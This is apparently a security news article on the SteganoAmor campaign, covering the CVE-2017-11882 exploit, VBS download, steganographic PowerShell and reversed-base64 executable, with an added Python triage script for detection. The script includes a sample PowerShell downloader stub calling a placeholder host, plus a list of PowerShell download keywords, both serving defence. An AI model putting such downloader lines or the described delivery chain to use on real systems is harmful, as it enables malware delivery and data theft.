A new campaign ‘SteganoAmor’ targets over 300 entities worldwide

April 18, 2024

A cyberattack campaign dubbed SteganoAmor has hit more than 320 organisations worldwide. Researchers attribute it to TA558, a hacking group known for targeting the hospitality and tourism sectors, particularly in Latin America.

The researchers note that the campaign stands out for its use of steganography: malicious code is hidden inside harmless-looking image files so that neither the recipient nor security tooling is likely to flag it.

The new SteganoAmor campaign leverages emails that contain Excel and Word files.

The campaign starts with deceptive emails carrying seemingly harmless document attachments, typically Excel and Word files.

These attachments exploit CVE-2017-11882, a known flaw in the Equation Editor component (EQNEDT32.EXE) of older Microsoft Office versions, which Microsoft patched in 2017. The emails are sent through compromised SMTP servers, so they originate from legitimate domains and are less likely to be flagged by reputation-based filters or to raise suspicion with recipients.

When a victim opens a tainted document, the exploit downloads a Visual Basic Script (VBS) from the legitimate paste service paste.ee, a source that does not look suspicious on its own. That script then retrieves an image file with a base64-encoded payload embedded in it.

The image looks harmless, but the embedded payload is PowerShell code, which in turn downloads the final stage: an executable stored as base64 text written in reverse, decoded on the victim's machine and run to deploy one of several malware strains.
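The decoding steps in this chain are simple to reproduce for triage. The following Python script is an added example, not code from the campaign or from the researchers' report. It assumes the base64 text is appended after a JPEG's end-of-image marker (the article does not say where in the image the payload sits), decodes it, flags common PowerShell download keywords, and undoes the reversed-base64 encoding of the final stage before checking for a PE header. The sample image, script and executable are constructed inline; the URL in the sample script is hypothetical.

```python
"""Triage helper for a SteganoAmor-style delivery chain.

Added example, not code from the campaign or from the researchers' report.
Assumptions not stated in the article: the base64 text is appended after the
JPEG end-of-image marker, and the final stage is plain base64 written backwards.
"""
import base64
import binascii
import re
from typing import Dict, Optional

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# A run of base64 alphabet characters with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
PS_MARKERS = ("New-Object", "DownloadString", "Invoke-Expression", "IEX", "FromBase64String")

# Constructed sample stage 2: a PowerShell downloader stub (hypothetical URL).
STAGE2_SCRIPT = (
    b"$u='https://example.invalid/payload.txt';"
    b"$b=(New-Object Net.WebClient).DownloadString($u)"
)
# Constructed sample "image": JPEG start/end markers around filler bytes, with
# the base64-encoded script appended after the end-of-image marker.
SAMPLE_IMAGE = JPEG_SOI + b"\xff\xe0" + b"\x00" * 32 + JPEG_EOI + base64.b64encode(STAGE2_SCRIPT)

# Constructed sample final stage: a fake PE (just the 'MZ' header and filler),
# base64-encoded and then reversed, as the article describes.
FAKE_EXE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"
SAMPLE_FINAL = base64.b64encode(FAKE_EXE).decode("ascii")[::-1]


def extract_appended_payload(image: bytes) -> Optional[bytes]:
    """Decode a base64 run found after the last JPEG EOI marker, if any."""
    eoi = image.rfind(JPEG_EOI)
    if eoi == -1:
        return None
    match = B64_RUN.search(image[eoi + len(JPEG_EOI):])
    if not match:
        return None
    try:
        # Strict decoding: stray non-base64 bytes (e.g. metadata) are rejected.
        return base64.b64decode(match.group(0), validate=True)
    except binascii.Error:
        return None


def decode_reversed_base64(text: str) -> Optional[bytes]:
    """Undo 'reversed base64': reverse the string, then decode it strictly."""
    try:
        return base64.b64decode(text[::-1], validate=True)
    except binascii.Error:
        return None


def looks_like_pe(data: bytes) -> bool:
    """Windows executables start with the 'MZ' DOS header magic."""
    return data[:2] == b"MZ"


def triage(image: bytes, final_stage: str) -> Dict[str, bool]:
    """Run both decoders and report what the chain would hand to the victim."""
    stage2 = extract_appended_payload(image)
    final = decode_reversed_base64(final_stage)
    stage2_text = stage2.decode("latin-1") if stage2 is not None else ""
    return {
        "image_has_appended_payload": stage2 is not None,
        "stage2_is_powershell": any(k in stage2_text for k in PS_MARKERS),
        "final_is_pe": final is not None and looks_like_pe(final),
    }


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_IMAGE, SAMPLE_FINAL).items():
        print(f"{name}: {verdict}")
```

Real samples may embed the text elsewhere in the file (inside a metadata segment, for instance), so the end-of-image tail is only the first place to look; the strict `validate=True` decoding keeps ordinary trailing metadata from producing false positives.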

The campaign is notable for the breadth of malware it delivers: AgentTesla, FormBook, Remcos, LokiBot, GuLoader, Snake Keylogger and XWorm. To make the downloads look benign, the attackers host payloads on reputable cloud services such as Google Drive, relying on the platforms' good reputation to slip past AV defences.

Compromised but legitimate FTP servers serve as command-and-control (C2) infrastructure and receive the exfiltrated data; because the hosts are genuine servers, the traffic blends in with ordinary FTP activity. Although most attacks have been concentrated in Latin America, SteganoAmor's targets span the globe and a wide range of sectors.

Despite the campaign's layered delivery chain, the defence is straightforward: the researchers urge organisations to update Microsoft Office, which neutralises the Equation Editor exploit at the very first step, so the rest of the chain never runs.

Patching this one vulnerability breaks the chain at its first link and protects organisations from SteganoAmor; the later stages (the VBS download, the image-embedded PowerShell and the reversed-base64 executable) are also worth watching for in email and endpoint telemetry.
